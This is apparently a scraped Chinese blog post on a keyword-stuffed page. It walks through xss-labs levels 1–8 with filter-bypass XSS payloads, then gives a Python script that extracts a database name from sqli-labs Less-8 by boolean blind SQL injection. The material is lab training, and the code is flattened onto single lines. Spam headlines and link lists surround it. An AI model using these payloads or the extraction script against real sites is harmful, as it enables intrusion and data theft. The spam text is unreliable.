当前位置: 首页 > wzjs >正文

株洲网站设计外包运营大连英文网站建设

株洲网站设计外包运营,大连英文网站建设,代刷网站只做软件,产品网络推广方案xss-labs 1到8关第一关我们发现&#xff0c;当我们更改name等于不同的值时&#xff0c;有不同的返回结果&#xff0c;因此在这里可能有xss漏洞然后直接进行测试&#xff0c;在name后面加入xss攻击语句​<script>alert(1)</script>第二关观察到input标签里面的value…

xss-labs 1到8关

第一关

我们发现,当我们更改name等于不同的值时,有不同的返回结果,因此在这里可能有xss漏洞

然后直接进行测试,在name后面加入xss攻击语句

​<script>alert(1)</script>

第二关

观察到input标签里面的value元素可以尝试突破,逃出引号后,可以使用事件来闭合后面的引号,这里距离onclick事件,当点击输入框后,执行这个弹窗

"><script>alert(1)</script

第三关

1' onclick='alert(1)

第四关

用"闭合后插入

1" onclick="alert(1)

第五关

查看源码发现把<script>转换成了<scr_ipt>,把on转成了o_n,这俩不能用了,换个标签

1'"> <a href="javascript:alert(1)">"'test</a>

第六关

直接使用大小写绕过

1'"> <a HRef="javaSCRipt:alert(1)">"'test</a>

第七关

1'"> <a hrhrefef="javascrscriptipt:alert(1)">"'test</a>

 双写了href和script

第八关

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

直接编码javascript:alert(1)为html实体编码

python实现自动化布尔自注的代码进行优化(二分查找)

import requests# 目标URL
url = "http://127.0.0.1/sqli/Less-8/index.php"charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "# 推断数据库名的长度
def get_database_length():length = 0while True:length += 1payload = f"1' AND (SELECT length(database()) = {length}) -- "response = requests.get(url, params={"id": payload})if "You are in..........." in response.text:return lengthif length > 50:  # 防止无限循环breakreturn 0# 使用二分查找推断数据库名
def get_database_name(length):db_name = ""for i in range(1, length + 1):left, right = 0, len(charset) - 1while left <= right:mid = (left + right) // 2char = charset[mid]payload = f"1' AND (SELECT substring(database(), {i}, 1) >= '{char}') -- "response = requests.get(url, params={"id": payload})if "You are in" in response.text:left = mid + 1else:right = mid - 1db_name += charset[right]return db_name# 主函数
if __name__ == "__main__":length = get_database_length()if length > 0:print(f"Database length: {length}")db_name = get_database_name(length)print(f"Database name: {db_name}")else:print("Failed to determine database length.")

http://www.dtcms.com/wzjs/549616.html

相关文章:

  • 免费建网站哪家好wordpress 中文 字体大小
  • 做电影网站需要那种服务器网站网页设计尺寸
  • 数字营销网站建设wordpress 古典
  • 云南做网站的公司wordpress和php
  • 中英文 微信网站 怎么做知名网站都是什么系统做的
  • 苏州企业网站推广阜宁企业网站建设
  • 住房和城乡建设部网站施工员做水印的网站
  • 安阳市住房和城乡建设厅网站ps网站子页怎么做
  • 招生网站怎么做四川建设厅证件查询网站
  • 网站充值提现公司账务怎么做注册公司要求什么条件
  • 青岛网站开发企业网页设计快速培训
  • 网站推广计划书范文贵州两学一做教育网站
  • php网站下载器提升了自己的网站
  • 做电商在什么网站吗建立数据库连接时出错 wordpress
  • 志愿北京网站注册网站开发上海
  • iis 5 新建网站shopkeeper wordpress
  • 郑州专业的网站公司公司邮箱怎么注册申请
  • 做明星网站青岛市做网站优化
  • 龙岗做网站公司szaow高端网站建设制作设计
  • 免费建立平台网站郑州校园兼职网站建设
  • 广东住房和城乡建设局网站龙之网官网
  • 做落地页的网站wordpress主题 使用教程
  • 大型网站开发收费网站设计方案及报价单
  • 一个网站的建设需要什么手续seo建站是什么
  • jsp做的个人网站wordpress侧栏弹窗登录
  • 如何做网站的营销网络设计是什么工作
  • 上海建设网站丽水网站开发公司
  • 怎么把网页放到网站上黔东南手机网站建设
  • 邯郸做紧固件网站wordpress汉化工具
  • 不想花钱做网站推广深圳设计网站有限公司